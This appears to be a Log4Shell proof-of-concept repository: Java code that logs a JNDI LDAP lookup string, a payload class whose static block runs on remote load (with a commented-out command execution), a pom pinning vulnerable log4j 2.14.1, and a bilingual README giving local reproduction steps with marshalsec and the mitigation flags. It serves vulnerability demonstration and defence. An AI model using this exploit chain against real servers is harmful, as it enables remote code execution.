├── .gitignore ├── src └── main │ └── java │ ├── log4j.java │ └── Log4jRCE.java ├── pom.xml └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | -------------------------------------------------------------------------------- /src/main/java/log4j.java: -------------------------------------------------------------------------------- 1 | import org.apache.logging.log4j.LogManager; 2 | import org.apache.logging.log4j.Logger; 3 | 4 | 5 | public class log4j { 6 | private static final Logger logger = LogManager.getLogger(log4j.class); 7 | 8 | public static void main(String[] args) { 9 | System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); 10 | logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}"); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/Log4jRCE.java: -------------------------------------------------------------------------------- 1 | public class Log4jRCE { 2 | 3 | static { 4 | System.out.println("I am Log4jRCE from remote!!!"); 5 | // try { 6 | // String[] cmd = {"code"}; 7 | // java.lang.Runtime.getRuntime().exec(cmd).waitFor(); 8 | // } catch (Exception e) { 9 | // e.printStackTrace(); 10 | // } 11 | } 12 | 13 | public Log4jRCE(){ 14 | System.out.println("I am Log4jRCE from remote222!!!"); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | log4j-rce 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.apache.logging.log4j 15 | log4j-core 16 | 2.14.1 17 | 18 | 19 | 20 | org.apache.logging.log4j 21 | log4j-api 22 | 2.14.1 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Apache-Log4j 2 | Apache Log4j 远程代码执行 3 | 4 | > 攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 5 | 6 | 7 | ### Steps 8 | 1. 【Important】***Move*** Log4jRCE.java to /home/remote/Log4jRCE.java, or any other directories except apache-log4j-poc. 9 | 10 | 2. Compile Log4jRCE.java and start http server 11 | 1. `cd /home/remote` 12 | 2. `javac Log4jRCE.java` 13 | 3. start http server，python or php，`php -S 127.0.0.1:8888` 14 | 15 | 3. Start ldap server 16 | 1. `git clone git@github.com:mbechler/marshalsec.git` 17 | 2. `cd marshalsec` 18 | 3. `mvn clean package -DskipTests` 19 | 4. start ldap server `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"` 20 | 21 | 4. Start log4j.java, then you can see `I am Log4jRCE from remote!!!` 22 | 23 | 24 | ### 触发步骤 25 | 1. 【重要】将Log4jRCE.java **挪出** 当前项目目录，比如挪到/home/remote/Log4jRCE.java，不然log4j.java运行时会读取到本地的Log4jRCE.java，就不走http远程下载了！ 26 | 27 | 2. 编译Log4jRCE.java并启动http server 28 | 1. 进入目录 `cd /home/remote` 29 | 2. 编译 `javac Log4jRCE.java` 30 | 3. 启动http server，python或php均可快速启动，如`php -S 127.0.0.1:8888` 31 | 32 | 3. 启动ldap server 33 | 1. `git clone git@github.com:mbechler/marshalsec.git` 34 | 2. `cd marshalsec` 35 | 3. `mvn clean package -DskipTests` 36 | 4. 启动ldap server `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"` 37 | 4. 启动log4j.java，然后就会发现命令行出现了`I am Log4jRCE from remote!!!`。底层就是会远程下载Log4jRCE.class，然后执行newInstance()，所以会执行static、构造函数代码。 38 | 39 | ### 修复方案： 40 | 41 | （1）修改jvm参数 42 | -Dlog4j2.formatMsgNoLookups=true 43 | 44 | （2）修改配置 45 | 在应用classpath下添加log4j2.component.properties配置文件，log4j2.formatMsgNoLookups=true 46 | --------------------------------------------------------------------------------